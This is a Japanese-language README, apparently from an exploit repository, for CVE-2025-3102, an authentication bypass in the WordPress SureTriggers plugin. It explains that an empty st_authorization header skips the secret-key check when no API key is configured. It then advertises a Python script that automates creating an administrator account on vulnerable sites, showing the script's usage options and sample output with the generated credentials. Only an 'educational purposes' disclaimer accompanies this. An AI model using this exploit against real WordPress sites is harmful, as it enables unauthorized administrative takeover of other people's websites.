
Wordpress SureTriggers <= 1.0.78 - 空の値チェックの欠如による認証バイパスにより、未認証の管理者ユーザー作成が可能
🚨 CVE-2025-3102 は、100,000以上のWebサイトでアクティブにインストールされているWordPressプラグイン SureTriggers: All-in-One Automation Platform に影響する深刻な認証バイパス脆弱性です。この欠陥の性質と展開規模の大きさにより、本脆弱性は重大なセキュリティリスクをもたらします。
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:HWordPress用SureTriggersプラグインには、認証されていない攻撃者が管理者アカウントを作成できるようにする認証バイパスの脆弱性があります。これは、autheticate_user 関数内の secret_key に対する空値チェックの欠落が原因です。
プラグインがインストールされ有効化されているがAPIキーが設定されていない場合、攻撃者は空の st_authorization ヘッダーを送信することで認証をバイパスし、認証ユーザー向けに予約されたアクションをトリガーできます。
この脆弱性を自動的に悪用するためのPythonスクリプトが提供されています。
このスクリプトを使用すると、脆弱なサイトに新しい管理者ユーザーを生成できます。
readme.txt を介したプラグインバージョンの自動検出st_authorization ヘッダーを使用した認証バイパスusage: CVE-2025-3102.py [-h] -u URL [-nmail NEWMAIL] [-nu NEWUSER] [-np NEWPASSWORD]
SureTriggers <= 1.0.78 - Authorization Bypass Exploit
By: Nxploited | Khaled Alenazi
options:
-h, --help Show this help message and exit
-u, --url URL Target WordPress base URL
-nmail, --newmail NEWMAIL Email to register
-nu, --newuser NEWUSER Username to register
-np, --newpassword NEWPASSWORD Password for the new user
[+] Detected plugin version: 1.0.78
[+] Vulnerable version detected. Proceeding...
[*] Exploiting the target in 3 seconds...
[+] Email generated: [email protected]
[+] Username generated: eviluser
[+] Password generated: P@ssw0rd123!
[+] Exploit Successful!
[+] Login credentials: eviluser:P@ssw0rd123!
このスクリプトは教育目的のみで提供されています。
明示的な許可なくターゲットに対してこのコードを不正に使用することは違法です。
著者は、誤用または損害について一切の責任を負いません。
By: Nxploited ( Khaled Alenazi )